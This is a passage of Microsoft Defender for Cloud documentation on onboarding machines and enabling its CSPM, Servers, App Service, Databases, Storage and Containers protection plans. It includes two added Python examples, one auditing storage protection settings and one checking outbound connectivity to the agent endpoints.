   as a proxy for machines with no internet connectivity to the Log Analytics
   workspace.]

2. Select the Download Windows Agent link that's applicable to your computer
   processor type to download the setup file.

3. From the Agents management page, copy the Workspace ID and Primary Key
   values into Notepad.

4. Copy the downloaded setup file to the target computer and run it.

5. Follow the installation wizard (select Next > I Agree > Next > Next).

6. On the Azure Log Analytics page, paste the Workspace ID and Primary Key values
   that you copied into Notepad.

7. If the computer should report to a Log Analytics workspace in the Azure
   Government cloud, select Azure US Government from the Azure Cloud dropdown
   list.

8. If the computer needs to communicate through a proxy server to the Log Analytics
   service, select Advanced. Then provide the URL and port number of the proxy
   server.

9. When you finish entering all of the configuration settings, select Next.

10. On the Ready to Install page, review the settings to be applied and select Install.

11. On the Configuration completed successfully page, select Finish.


When the process is complete, Microsoft Monitoring agent appears in Control Panel. 
You can review your configuration there and verify that the agent is connected. 


For more information on installing and configuring the agent, see Connect Windows 
machines. 


Onboard your Linux server 


To add Linux machines, you need the wget command from the Agents management
page.

To onboard your Linux server:


1. Select Linux servers.

   [Screenshot: the Agents management page. It shows how many Linux computers are
   connected via the Azure Monitor Linux agent and via the Log Analytics Linux agent
   (legacy), a link to Data Collection Rules, and under Log Analytics agent instructions
   a "Download and onboard agent for Linux" box containing a wget command that
   begins "wget https://raw.githubusercontent.com/Microsoft/OMS-Agent-for-Li ..." with
   a copy button.]

2. Copy the wget command into Notepad. Save this file to a location that you can
   access from your Linux computer.

3. On your Linux computer, open the file that contains the wget command. Copy the
   entire contents and paste them into a terminal console.

4. When the installation finishes, validate that the Operations Management Suite
   Agent is installed by running the pgrep command. The command returns the
   omsagent persistent ID.

   You can find the logs for the agent at /var/opt/microsoft/omsagent/<workspace
   id>/log/. The new Linux machine might take up to 30 minutes to appear in
   Defender for Cloud.


Verify that your machines are connected

Your Azure and on-premises machines are available to view in one location.

To verify that your machines are connected:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. On the Defender for Cloud menu, select Inventory to show the asset inventory.
4. Filter the page to view the relevant resource types. These icons distinguish the
   types:

   [icon] Non-Azure machine
   [icon] Azure VM
   [icon] Azure Arc-enabled server


Clean up resources 


There's no need to clean up any resources for this article. 


Next steps 


• Protect all of your resources with Defender for Cloud.
• Set up your AWS account and GCP projects.


Protect your resources with Defender CSPM

Defender Cloud Security Posture Management (CSPM) in Microsoft Defender for Cloud
provides you with hardening guidance that helps you efficiently and effectively improve
your security. CSPM also gives you visibility into your current security situation.


Defender for Cloud continually assesses your resources, subscriptions, and organization 
for security issues. Defender for Cloud shows you your security posture with the secure 
score. The secure score is an aggregated score of the security findings that tells you 
your current security situation. The higher the score, the lower the identified risk level. 


When you enable Defender for Cloud, you automatically enable the Foundational CSPM
capabilities. These capabilities are part of the free services offered by Defender for
Cloud.


You have the ability to enable the Defender CSPM plan, which offers extra protections
for your environments such as governance, regulatory compliance, cloud security
explorer, attack path analysis and agentless scanning for machines.


Note

Agentless scanning requires the Subscription Owner to enable the Defender CSPM
plan. Anyone with a lower level of authorization can enable the Defender CSPM
plan, but the agentless scanner won't be enabled by default due to a lack of required
permissions that are only available to the Subscription Owner. In addition, attack
path analysis and security explorer won't populate with vulnerabilities because the
agentless scanner is disabled.


For availability and to learn more about the features offered by each plan, see the 
Defender CSPM plan options. 


You can learn more about Defender CSPM's pricing on the pricing page.


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription,
  you can sign up for a free subscription.
• You must enable Microsoft Defender for Cloud on your Azure subscription.
• Connect your non-Azure machines, AWS accounts or GCP projects.
• In order to gain access to all of the features available from the CSPM plan, the plan
  must be enabled by the Subscription Owner.


Enable the Defender CSPM plan 


When you enable Defender for Cloud, you automatically receive the protections offered 
by the Foundational CSPM capabilities. In order to gain access to the other features 
provided by Defender CSPM, you need to enable the Defender CSPM plan on your 
subscription. 


To enable the Defender CSPM plan on your subscription: 
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant Azure subscription, AWS account or GCP project. 
5. On the Defender plans page, toggle the Defender CSPM plan to On. 


6. Select Save. 


Enable the components of the Defender CSPM plan


Once the Defender CSPM plan is enabled on your subscription, you have the ability to 
enable the individual components of the Defender CSPM plan: 


• Agentless scanning for machines: Scans your machines for installed software and
  vulnerabilities without relying on agents or impacting machine performance. You
  can disable the agentless scanner or add exclusion tags to your subscription.

• Agentless discovery for Kubernetes: API-based discovery of information about
  Kubernetes cluster architecture, workload objects, and setup. Required for
  Kubernetes inventory, identity and network exposure detection, and risk hunting as
  part of the cloud security explorer. This extension is required for attack path
  analysis (DCSPM only).

• Container registries vulnerability assessments: Provides vulnerability management
  for images stored in your container registries.

• Sensitive data discovery: Automatically discovers managed cloud data resources
  containing sensitive data at scale. This feature accesses your data, is agentless,
  uses smart sampling scanning, and integrates with Microsoft Purview sensitive
  information types and labels.


To enable the components of the Defender CSPM plan: 


1. On the Defender plans page, select Settings.

   [Screenshot: the Defender plans page, noting that when you select Save, the
   enhanced security features are enabled on all the resource types you've selected
   and that the first 30 days are free.]

2. Select On for each component to enable it.

3. (Optional) For agentless scanning for machines, select Edit configuration.

   [Screenshot: the Settings & monitoring pane.]

   a. Enter a tag name and tag value for any machines to be excluded from scans.
   b. Select Apply.

4. Select Continue.


Next steps 


Cloud Security Posture Management (CSPM) 


Protect your servers with Defender for Servers

Defender for Servers in Microsoft Defender for Cloud brings threat detection and
advanced defenses to your Windows and Linux machines that run in Azure, Amazon
Web Services (AWS), Google Cloud Platform (GCP), and on-premises environments. This
plan includes the integrated license for Microsoft Defender for Endpoint, security
baselines and OS level assessments, vulnerability assessment scanning, adaptive
application controls (AAC), file integrity monitoring (FIM), and more.


Microsoft Defender for Servers includes an automatic, native integration with Microsoft
Defender for Endpoint. To learn more, see Protect your endpoints with Defender for
Cloud's integrated EDR solution: Microsoft Defender for Endpoint. With this integration
enabled, you have access to the vulnerability findings from Microsoft threat and
vulnerability management.


Defender for Servers offers two plan options with different levels of protection and their
own cost. You can learn more about Defender for Cloud's pricing on the pricing page.


Prerequisites 


• You need a Microsoft Azure subscription. If you don't have an Azure subscription,
  you can sign up for a free subscription.
• You must enable Microsoft Defender for Cloud on your Azure subscription.
• Review the Defender for Servers deployment guide.


Enable the Defender for Servers plan 


You can enable the Defender for Servers plan from the Environment settings page to 
protect all the machines in an Azure subscription, AWS account, or GCP project. 


To enable the Defender for Servers plan:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the relevant subscription.
5. On the Defender plans page, toggle the Servers switch to On.

   [Screenshot: the Defender plans page with the Servers plan toggled On, noting that
   when you select Save, Microsoft Defender for Cloud's enhanced security features
   will be enabled on all the resource types you've selected and that the first 30 days
   are free; for more information on Defender for Cloud pricing, visit the pricing page.]


Select a Defender for Servers plan 


When you enable the Defender for Servers plan, you're then given the option to select 
which plan - Plan 1 or Plan 2 - to enable. There are two plans you can choose from that 
offer different levels of protections for your resources. 


Review what's included in each plan.

To select a Defender for Servers plan:

1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud.
3. In the Defender for Cloud menu, select Environment settings.
4. Select the relevant Azure subscription, AWS account, or GCP project.
5. Select Change plans.

   [Screenshot: the Environment settings page for the subscription, showing the
   Change plans link on the Servers row.]

6. In the popup window, select Plan 2 or Plan 1.

   [Screenshot: the plan selection popup. Defender for Servers is offered in two plans.
   Plan 1 provides a limited set of defenses with a focus on Defender for Endpoint's
   protections. Plan 2 (formerly "Defender for Servers") offers the full set of Defender
   for Cloud's enhanced security features. Plan 2 (recommended) lists: agentless
   vulnerability scanning; Microsoft Defender for Endpoint; Microsoft Defender
   Vulnerability Management; automatic agent onboarding, alert and data integration;
   just-in-time VM access for management ports; network layer threat detection;
   adaptive application controls; file integrity monitoring; adaptive network hardening;
   integrated vulnerability assessment powered by Qualys; Log Analytics 500 MB free
   data ingestion. Both plans are priced per server per month.]

7. Select Confirm.

8. Select Save.


Configure monitoring coverage 


There are three components that can be enabled and configured to provide extra 
protections to your environments in the Defender for Servers plans. 


Component: Log Analytics agent/Azure Monitor agent
Description: Collects security-related configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis.
Learn more: Learn more about the Log Analytics agent.

Component: Vulnerability assessment for machines
Description: Enables vulnerability assessment on your Azure and hybrid machines.
Learn more: Learn more about how Defender for Cloud collects data.

Component: Agentless scanning for machines
Description: Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine performance.
Learn more: Learn more about agentless scanning for machines.


To enable any of these options, toggle the corresponding switch to On.


Configure Log Analytics agent/Azure Monitor agent 


After enabling the Log Analytics agent/Azure Monitor agent, you'll be presented with 
the option to select either the Log Analytics agent or the Azure Monitor agent and 
which workspace should be utilized. 


To configure the Log Analytics agent/Azure Monitor agent: 


1. Select Edit configuration. 


2. In the Auto provisioning configuration window, select one of the following two 
agent types: 


   - Log Analytics Agent (Default) - Collects security-related configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis.

   - Azure Monitor Agent (Preview) - Collects security-related configurations and event logs from the machine and stores the data in your Log Analytics workspace for analysis.


(Screenshot of the Auto-provisioning configuration window: agent type (Log Analytics Agent (Default) or Azure Monitor Agent (Preview)), workspace selection (Default workspace(s) or Custom workspace), and security events storage (All Events). The window notes that when selecting a custom workspace you should make sure the relevant solutions are enabled on it; that if a VM already has either the SCOM or OMS agent installed locally, the Log Analytics agent extension will still be installed and connected to the configured workspace; that any other solutions enabled on the selected workspace will be applied to Azure VMs connected to it, which for paid solutions could result in additional charges; and that for data privacy considerations you should make sure the selected workspace is in your desired region.)


3. Select either a Default workspace(s) or a Custom workspace depending on your 
need. 


4. Select Apply. 


Configure vulnerability assessment for machines 


Vulnerability assessment for machines allows you to select between two vulnerability 
assessment solutions: 


- Microsoft Defender vulnerability management
- Microsoft Defender for Cloud integrated Qualys scanner


To select either of the vulnerability assessment solutions: 


1. Select Edit configuration. 


2. In the Extension deployment configuration window, select either of the solutions depending on your need.


3. Select Apply. 


Configure agentless scanning for machines (preview) 


Defender for Cloud has the ability to scan your Azure machines for installed software 
and vulnerabilities without requiring you to install agents, have network connectivity or 
affect your machine's performance. 


To configure agentless scanning for machines: 


1. Select Edit configuration. 
2. Enter a tag name and tag value for any machines to be excluded from scans.


3. Select Apply. 


Next steps 


Overview of Microsoft Defender for Servers 


Protect your applications with Defender 
for App Service 
Azure App Service is a fully managed platform for building and hosting your web apps and APIs. It provides management, monitoring, and operational insights to meet enterprise-grade performance, security, and compliance requirements. For more information, see Azure App Service.


Microsoft Defender for App Service uses the scale of the cloud to identify attacks 
targeting applications running over App Service. Attackers probe web applications to 
find and exploit weaknesses. Before being routed to specific environments, requests to 
applications running in Azure go through several gateways, where they're inspected and 
logged. The data is then used to identify exploits and attackers, and to learn new 
patterns that are used later. 


When you enable Microsoft Defender for App Service, you immediately benefit from the 
following services offered by this Defender plan: 


- Secure - Defender for App Service assesses the resources covered by your App Service plan and generates security recommendations based on its findings. Use the detailed instructions in these recommendations to harden your App Service resources.

- Detect - Defender for App Service detects a multitude of threats to your App Service resources by monitoring:

  - the VM instance in which your App Service is running, and its management interface
  - the requests and responses sent to and from your App Service apps
  - the underlying sandboxes and VMs
  - App Service internal logs - available thanks to the visibility that Azure has as a cloud provider


As a cloud-native solution, Defender for App Service can identify attack methodologies 
applying to multiple targets. For example, from a single host it would be difficult to 
identify a distributed attack from a small subset of IPs, crawling to similar endpoints on 
multiple hosts. 


The log data and the infrastructure together can tell the story: from a new attack circulating in the wild to compromises in customer machines. Therefore, even if Microsoft Defender for App Service is deployed after a web app has been exploited, it might be able to detect ongoing attacks.


You can learn more about Defender for Cloud's pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- You must have a supported App Service plan associated with dedicated machines. See the list of supported plans.


Enable the Defender for App Service plan 


When you enable Defender for Cloud, you have the ability to add the Defender for App Service plan to your subscription to manage, monitor and gain operational insights to meet enterprise-grade performance, security, and compliance requirements for your machines.

To enable Defender for App Service on your subscription:
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the App Service plan to On. 


6. Select Save. 


Next steps 


Overview of Defender for App Service to protect your Azure App Service web apps and 
APIs 


Protect your databases with Defender 
for Databases 
Defender for Databases in Microsoft Defender for Cloud allows you to protect your 
entire database estate with attack detection and threat response for the most popular 
database types in Azure. Defender for Cloud provides protection for the database 
engines and for data types, according to their attack surface and security risks. 


Database protection includes: 


- Microsoft Defender for Azure SQL databases
- Microsoft Defender for SQL servers on machines
- Microsoft Defender for open-source relational databases
- Microsoft Defender for Azure Cosmos DB


These four database protection plans are priced separately. Get more info about Defender for Cloud's pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- Connect your non-Azure machines, AWS account or GCP projects.


Enable the Databases plan 


When you enable database protection, you enable all four of the Defender plans and 
protect all of the supported databases on your subscription. 


To enable Defender for Databases on your subscription: 
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant Azure subscription, AWS account or GCP project. 


5. On the Defender plans page, toggle the Databases plan to On. 
Enable specific database protections


When you enable database protection, you enable the following four Defender plans: 


- Defender for Azure SQL databases
- Defender for SQL server on machines
- Defender for open-source relational databases
- Defender for Azure Cosmos DB


These plans protect all of the supported databases in your subscription. 
To enable specific database protections on your subscription: 

1. Sign in to the Azure portal.

2. Search for and select Microsoft Defender for Cloud. 

3. In the Defender for Cloud menu, select Environment settings. 

4. Select the relevant subscription. 


5. On the Defender plans page, locate the Databases plan and select Select types. 




6. In the Resource types selection window, toggle the desired plans to On or Off. 


7. (Optional) Exclude specific database resource types by toggling them to Off.
8. Select Continue.


9. Select Save. 


Next steps 


Overview of Microsoft Defender for Azure SQL 


Microsoft Defender for SQL servers on machines 


Overview of Microsoft Defender for open-source relational databases 


Overview of Microsoft Defender for Azure Cosmos DB 


Deploy Microsoft Defender for Storage 
Microsoft Defender for Storage is an Azure-native solution offering an advanced layer of intelligence for threat detection and mitigation in storage accounts, powered by Microsoft Threat Intelligence, Microsoft Defender Antimalware technologies, and Sensitive Data Discovery. With protection for Azure Blob Storage, Azure Files, and Azure Data Lake Storage services, it provides a comprehensive alert suite, near real-time Malware Scanning (add-on), and sensitive data threat detection (no extra cost), allowing quick detection, triage, and response to potential security threats with contextual information. It helps prevent the three major impacts on your data and workload: malicious file uploads, sensitive data exfiltration, and data corruption.


With Microsoft Defender for Storage, organizations can customize their protection and 
enforce consistent security policies by enabling it on subscriptions and storage accounts 
with granular control and flexibility. 


Tip


If you're currently using Microsoft Defender for Storage classic, consider migrating 
to the new plan, which offers several benefits over the classic plan. 


Availability 


Aspect: Release state
Details: General Availability (GA)

Aspect: Feature availability
Details:
  - Activity monitoring (security alerts) - General Availability (GA)
  - Malware Scanning - General Availability (GA)
  - Sensitive data threat detection (Sensitive Data Discovery) - Preview
  Visit the pricing page to learn more.

Aspect: Required roles and permissions
Details: For Malware Scanning and sensitive data threat detection at subscription and storage account levels, you need Owner roles (subscription owner/storage account owner) or specific roles with corresponding data actions. To enable Activity Monitoring, you need 'Security Admin' permissions. Read more about the required permissions.

Aspect: Clouds
Details:
  - Azure Commercial clouds* - supported
  - Azure Government - supported (only activity monitoring support on the classic plan)
  - Azure China 21Vianet - not supported
  - Connected AWS accounts - not supported

*Azure DNS Zone is not supported for Malware Scanning and sensitive data threat detection.


Prerequisites for Malware scanning 


To enable and configure Malware Scanning, you must have Owner roles (such as 
Subscription Owner or Storage Account Owner) or specific roles with the necessary data 
actions. Learn more about the required permissions. 


Set up and configure Microsoft Defender for 
Storage 


To enable and configure Microsoft Defender for Storage and ensure maximum 
protection and cost optimization, the following configuration options are available: 


- Enable/disable Microsoft Defender for Storage at the subscription and storage account levels.
- Enable/disable the Malware Scanning or sensitive data threat detection configurable features.
- Set a monthly cap ("capping") on the Malware Scanning per storage account per month to control costs (default value is 5,000GB).
- Configure methods to set up response to malware scanning results.
- Configure methods for saving malware scanning results logging.


Tip

The Malware Scanning feature has advanced configurations to help security teams support different workflows and requirements.

- Override subscription-level settings to configure specific storage accounts with custom configurations that differ from the settings configured at the subscription level.


There are several ways to enable and configure Defender for Storage: using the Azure built-in policy (the recommended method), programmatically using Infrastructure as Code templates, including Terraform, Bicep, and ARM templates, using the Azure portal, or directly with the REST API.


Enabling Defender for Storage via a policy is recommended because it facilitates 
enablement at scale and ensures that a consistent security policy is applied across all 
existing and future storage accounts within the defined scope (such as entire 
management groups). This keeps the storage accounts protected with Defender for 
Storage according to the organization's defined configuration. 
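As an added example (not code from the Microsoft documentation), the Python below builds the per-account settings body that the configuration options above describe and audits a constructed inventory of storage accounts for drift from an organization policy (plan disabled, Malware Scanning cap raised above the agreed limit, sensitive data threat detection switched off). The property names are the author's understanding of the Microsoft.Security/defenderForStorageSettings "current" resource and should be confirmed against the current REST API reference before use.

```python
"""Desired-state audit for Defender for Storage per-account settings.

Added example, not code from the Microsoft documentation. The property names
(isEnabled, malwareScanning.onUpload.isEnabled, malwareScanning.onUpload.capGBPerMonth,
sensitiveDataDiscovery.isEnabled, overrideSubscriptionLevelSettings) are the
author's understanding of the Microsoft.Security/defenderForStorageSettings
'current' resource; confirm them against the current REST API reference.
"""
from dataclasses import dataclass

DEFAULT_CAP_GB = 5000  # default monthly Malware Scanning cap stated on the page


@dataclass(frozen=True)
class StoragePolicy:
    """The configuration an organization wants on every storage account."""
    enabled: bool = True
    malware_scanning: bool = True
    cap_gb_per_month: int = DEFAULT_CAP_GB  # upper bound an account may not exceed
    sensitive_data_discovery: bool = True
    override_subscription: bool = False


def settings_payload(policy: StoragePolicy) -> dict:
    """Build the PUT body for
    {storageAccountId}/providers/Microsoft.Security/defenderForStorageSettings/current."""
    if policy.cap_gb_per_month <= 0:
        raise ValueError("cap_gb_per_month must be a positive number of GB")
    return {
        "properties": {
            "isEnabled": policy.enabled,
            "malwareScanning": {
                "onUpload": {
                    "isEnabled": policy.malware_scanning,
                    "capGBPerMonth": policy.cap_gb_per_month,
                }
            },
            "sensitiveDataDiscovery": {"isEnabled": policy.sensitive_data_discovery},
            "overrideSubscriptionLevelSettings": policy.override_subscription,
        }
    }


def account_findings(name: str, current: dict, policy: StoragePolicy) -> list:
    """List the ways one account's current settings fall short of the policy."""
    props = current.get("properties", {})
    upload = props.get("malwareScanning", {}).get("onUpload", {})
    findings = []
    if props.get("isEnabled") != policy.enabled:
        findings.append(f"{name}: plan enabled={props.get('isEnabled')}, want {policy.enabled}")
    if upload.get("isEnabled") != policy.malware_scanning:
        findings.append(f"{name}: malware scanning={upload.get('isEnabled')}, want {policy.malware_scanning}")
    cap = upload.get("capGBPerMonth")
    # A cap above the policy limit silently raises the monthly spend ceiling.
    if policy.malware_scanning and (cap is None or cap > policy.cap_gb_per_month):
        findings.append(f"{name}: malware scanning cap {cap} GB exceeds policy {policy.cap_gb_per_month} GB")
    sdd = props.get("sensitiveDataDiscovery", {}).get("isEnabled")
    if sdd != policy.sensitive_data_discovery:
        findings.append(f"{name}: sensitive data threat detection={sdd}, want {policy.sensitive_data_discovery}")
    return findings


def audit(inventory: dict, policy: StoragePolicy) -> dict:
    """Map each non-compliant account name to its findings; compliant accounts are omitted."""
    report = {}
    for name, current in inventory.items():
        findings = account_findings(name, current, policy)
        if findings:
            report[name] = findings
    return report


# Constructed sample inventory standing in for GET responses from three accounts.
SAMPLE_INVENTORY = {
    "stfinancelogs": settings_payload(StoragePolicy()),  # compliant
    "stlegacybackup": {"properties": {"isEnabled": False}},  # plan never enabled
    "stmediauploads": {  # enabled, but cap raised far above policy and SDD off
        "properties": {
            "isEnabled": True,
            "malwareScanning": {"onUpload": {"isEnabled": True, "capGBPerMonth": 20000}},
            "sensitiveDataDiscovery": {"isEnabled": False},
            "overrideSubscriptionLevelSettings": True,
        }
    },
}

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INVENTORY, StoragePolicy()).items():
        print("\n".join(findings))
```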


Note

To prevent migrating back to the legacy classic plan, make sure to disable the old Defender for Storage policies. Look for and disable policies named Configure Azure Defender for Storage to be enabled, Azure Defender for Storage should be enabled, or Configure Microsoft Defender for Storage to be enabled (per-storage account plan) or deny policies that prevent the disablement of the classic plan.


Next steps 


- Learn how to enable and configure the Defender for Storage plan at scale with an Azure built-in policy.


Protect your Azure containers with 
Defender for Containers 
Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution that is used to secure your containers so you can improve, monitor, and maintain the security of your clusters, containers, and their applications.

Learn more about Overview of Microsoft Defender for Containers.

You can learn more about Defender for Containers' pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- Ensure the required Fully Qualified Domain Names (FQDN)/application endpoints are configured for outbound access so the Defender agent can connect to Microsoft Defender for Cloud to send security data and events.


Note

By default, AKS clusters have unrestricted outbound (egress) internet access.


Enable the Defender for Containers plan 


By default, when enabling the plan through the Azure portal, Microsoft Defender for 
Containers is configured to automatically install required components to provide the 
protections offered by plan, including the assignment of a default workspace. 


If you would prefer to assign a custom workspace, one can be assigned through the Azure Policy.

To enable the Defender for Containers plan on your subscription:
1. Sign in to the Azure portal.


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant Azure subscription. 


5. On the Defender plans page, toggle the Containers plan to On. 
6. Select Save.


Deploy the Defender agent in Azure 


Note

To enable or disable individual Defender for Containers capabilities, either globally or for specific resources, see How to enable Microsoft Defender for Containers components.


You can enable the Defender for Containers plan and deploy all of the relevant 
components in different ways. We walk you through the steps to accomplish this using 
the Azure portal. Learn how to deploy the Defender agent with REST API, Azure CLI or 
with a Resource Manager template. 


To deploy the Defender agent in Azure: 
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 
3. Navigate to the Recommendations page. 


4. Search for and select the Azure Kubernetes Service clusters should have Defender profile enabled recommendation.
5. Select all of the relevant affected resources.


6. Select Fix. 
Next steps

- For advanced enablement features for Defender for Containers, see the Enable Microsoft Defender for Containers page.
- Overview of Microsoft Defender for Containers.


Protect your on-premises Kubernetes 
clusters with Defender for Containers 
Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution that is used to secure your containers so you can improve, monitor, and maintain the security of your clusters, containers, and their applications.

Learn more about Overview of Microsoft Defender for Containers.

You can learn more about Defender for Containers' pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- Ensure the following Azure Arc-enabled Kubernetes network requirements are validated and connect the Kubernetes cluster to Azure Arc.
- Validate the following endpoints are configured for outbound access so that the Defender agent can connect to Microsoft Defender for Cloud to send security data and events:

  Domain                        Port
  *.ods.opinsights.azure.com    443
  *.oms.opinsights.azure.com    443
  login.microsoftonline.com     443

- Connect the Kubernetes cluster to Azure Arc
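To verify the outbound access this prerequisite describes before onboarding, here is an added Python check (not from the Microsoft documentation) that expands the wildcard domains and attempts a TCP connection to each endpoint from the node or pod it runs on. It assumes the wildcard label is filled with the Log Analytics workspace ID the agent reports to; WORKSPACE_ID is a constructed placeholder.

```python
"""Outbound connectivity check for the Defender agent endpoints listed above.

Added example, not part of the Microsoft documentation. Run it from a node (or a
pod) of the cluster you are onboarding. Wildcard entries are expanded with the
Log Analytics workspace ID the agent will report to; this is the author's
assumption about how '*.ods/oms.opinsights.azure.com' is filled in.
"""
import socket

# Endpoints from the prerequisites table as (domain, port); '*.' marks a wildcard label.
REQUIRED_ENDPOINTS = [
    ("*.ods.opinsights.azure.com", 443),
    ("*.oms.opinsights.azure.com", 443),
    ("login.microsoftonline.com", 443),
]

WORKSPACE_ID = "00000000-0000-0000-0000-000000000000"  # constructed placeholder


def expand_endpoints(endpoints, workspace_id):
    """Replace the leading wildcard label of each domain with the workspace ID."""
    expanded = []
    for domain, port in endpoints:
        if domain.startswith("*."):
            domain = workspace_id + domain[1:]
        expanded.append((domain, port))
    return expanded


def tcp_reachable(host, port, timeout=3.0):
    """True if a TCP connection to host:port completes within timeout.

    DNS failures, refused connections, egress filtering and timeouts all
    surface as OSError subclasses and yield False.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_all(endpoints, workspace_id, timeout=3.0):
    """Return {"host:port": reachable} for every expanded endpoint."""
    return {
        f"{host}:{port}": tcp_reachable(host, port, timeout)
        for host, port in expand_endpoints(endpoints, workspace_id)
    }


if __name__ == "__main__":
    results = check_all(REQUIRED_ENDPOINTS, WORKSPACE_ID)
    for endpoint, ok in results.items():
        print(f"{'OK     ' if ok else 'BLOCKED'} {endpoint}")
    # Non-zero exit lets a pre-onboarding pipeline stop before the agent is deployed.
    raise SystemExit(0 if all(results.values()) else 1)
```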


Enable the Defender for Containers plan 


By default, when enabling the plan through the Azure portal, Microsoft Defender for 
Containers is configured to automatically install required components to provide the 
protections offered by plan, including the assignment of a default workspace. 


If you would prefer to assign a custom workspace, one can be assigned through the 
Azure Policy. 


To enable Defender for Containers plan on your subscription: 
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Containers plan to On. 
6. Select Save.


Note

To enable or disable individual Defender for Containers capabilities, either globally or for specific resources, see How to enable Microsoft Defender for Containers components.


Deploy the Defender agent on Arc-enabled 
Kubernetes clusters 


You can enable the Defender for Containers plan and deploy all of the relevant 
components in different ways. We walk you through the steps to accomplish this using 
the Azure portal. Learn how to deploy the Defender agent with REST API, Azure CLI or 
with a Resource Manager template. 


To deploy the Defender agent in Azure: 
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 


3. Navigate to the Recommendations page. 


4. Search for and select the Azure Arc-enabled Kubernetes clusters should have the Defender extension installed recommendation.
5. Select all of the relevant affected resources.


6. Select Fix. 


Next steps 
- For advanced enablement features for Defender for Containers, see the Enable Microsoft Defender for Containers page.
- Overview of Microsoft Defender for Containers.


Protect your Amazon Web Service 
(AWS) containers with Defender for 
Containers 


Article 08/13/2023


Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution 
that is used to secure your containers so you can improve, monitor, and maintain the 
security of your clusters, containers, and their applications. 


Learn more about Overview of Microsoft Defender for Containers. 


You can learn more about Defender for Containers' pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- Connect your AWS account to Microsoft Defender for Cloud.
- Validate the following domains only if you're using a relevant OS.

  Domain                                   Port   Host operating systems
  amazonlinux.*.amazonaws.com/2/extras/*   443    Amazon Linux 2
  yum default repositories                 -      RHEL / CentOS
  apt default repositories                 -      Debian

- Ensure the following Azure Arc-enabled Kubernetes network requirements are validated.


Enable the Defender for Containers plan on 
your AWS account 


To protect your EKS clusters, you need to enable the Containers plan on the relevant AWS account connector.


To enable the Defender for Containers plan on your AWS account: 
1. Sign in to the Azure portal.
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant AWS account. 


6. (Optional) To change the retention period for your audit logs, select Settings, enter the required time frame, and select Save.


Note

If you disable this configuration, then the Threat detection (control plane) feature will be disabled. Learn more about features availability.


7. Select Next: Review and generate. 


8. Select Update. 


Note

To enable or disable individual Defender for Containers capabilities, either globally or for specific resources, see How to enable Microsoft Defender for Containers components.


Deploy the Defender agent in EKS clusters 


Azure Arc-enabled Kubernetes, the Defender agent, and Azure Policy for Kubernetes should be installed and running on your EKS clusters. There's a dedicated Defender for Cloud recommendation that can be used to install these extensions (and Azure Arc if necessary):

- EKS clusters should have Microsoft Defender's extension for Azure Arc installed


To deploy the required extensions: 


1. From Defender for Cloud's Recommendations page, search for one of the recommendations by name.


2. Select an unhealthy cluster. 


Important

You must select the clusters one at a time.
Don't select the clusters by their hyperlinked names: select anywhere else in the relevant row.
3. Select Fix. 
4. Defender for Cloud generates a script in the language of your choice: 


   - For Linux, select Bash.
   - For Windows, select PowerShell.
5. Select Download remediation logic. 


6. Run the generated script on your cluster. 




Next steps 


- For advanced enablement features for Defender for Containers, see the Enable Microsoft Defender for Containers page.
- Overview of Microsoft Defender for Containers.


Protect your Google Cloud Platform 
(GCP) containers with Defender for 
Containers 
Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution 
that is used to secure your containers so you can improve, monitor, and maintain the 
security of your clusters, containers, and their applications. 


Learn more about Overview of Microsoft Defender for Containers. 


You can learn more about Defender for Containers' pricing on the pricing page.


Prerequisites 


- You need a Microsoft Azure subscription. If you don't have an Azure subscription, you can sign up for a free subscription.
- You must enable Microsoft Defender for Cloud on your Azure subscription.
- Connect your GCP projects to Microsoft Defender for Cloud.
- Validate the following domains only if you're using a relevant OS.

  Domain                                   Port   Host operating systems
  amazonlinux.*.amazonaws.com/2/extras/*   443    Amazon Linux 2
  yum default repositories                 -      RHEL / CentOS
  apt default repositories                 -      Debian

- Ensure the following Azure Arc-enabled Kubernetes network requirements are validated.


Enable the Defender for Containers plan on 
your GCP project 


To protect Google Kubernetes Engine (GKE) clusters: 


1. Sign in to the Azure portal.


2. Search for and select Microsoft Defender for Cloud. 


